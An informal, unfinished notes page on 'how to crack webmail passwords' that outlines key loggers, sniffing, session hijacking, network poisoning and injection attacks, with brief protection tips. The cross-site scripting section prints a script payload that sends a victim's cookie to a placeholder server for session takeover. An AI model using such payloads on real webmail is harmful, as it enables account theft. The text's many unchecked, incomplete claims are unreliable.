Disclaimer
----------
Hacking is illegal. Don't do it.
This information is here to show you what kind of attacks you might face, so you can better protect yourself.



I know about some of this stuff from actually trying it in a "lab" environment, but most is just from general knowledge of how things work. Note: you learn about 1000x more actually trying the attacks than just theoreticising, but it is really hard work.


How to crack webmail passwords


There is an important distinction here between resetting a forgotten password and breaking some else's account. To break an account, you just need to capture the password in transit or hijack a session. Whereas if the password is forgotten, you need to do a full-blown break-in.

Capturing the password in transit
---------------------------------

Key logger
A key logger sits on a computer and records all the key

  social engineering --> more on that later because we are "just sat waiting for a login"

Trojan key logger
  or even active attack

--
Tcpdump
  session hijack
  Password crackers
  Replay attack <--- actually timestamp prevents this well!
      should use javascript to refresh login page so we don't miss the timeout
ARP poisoning

DNS cache poisoning
If you pull this off, you are pretty "1337" :-)

BGP poisoning

Protecting yourself
SSL protects against *ALL* these network based attacks. However, you mustn't blindly click "yes" to this:

If you do that, you throw away your high-grade encryption in a single click.

Session hijack
--------------

Cross-site scripting
The idea of a cross-site scripting attack is to find a way to inject your own javascript code into a webmail page. The simplest way would be to try just embeding it in an email. You would want to embed something like:
<blockquote><code>&lt;script language=javascript&gt;window.open('http://your.server/script.cgi?cookie='+document.cookie)&lt;/script&gt;</code></blockquote>
This would deliver the user's login cookie to you. There are usually no IP address restrictions (I think -- CHECK!!!!!!) so then you can just take over their login session, without them even noticing.

Of course, that simple approach won't work, because the webmail system will filter the input (TBD: exactly how!!!). But there are two things to look for: really odd input combinations that bypass the protection, and obscure, little-used fields that might have been forgotten. There are a number of tools available that automatically scan for such vulnerabilities in web applications. They can also occour

Protecting yourself
Many cross-site scripting attacks will cause odd browser behaviour, or require you to click on odd-looking links. So be vigilant!

Note: SSL provides absolutely zero protection against cross-site scripting!!! The cookie just jumps through 1024-bit RSA encryption.


Forgotten password
------------------
Let me say now, unless so are "uber" beyond what I can imagine, so stand a very small chance of success here. Regardless...

SQL injection
script injection
buffer overflow
scanning for vulns

logic error
if you discover one of these you have hit jackpot. one was discovered in microsoft passport
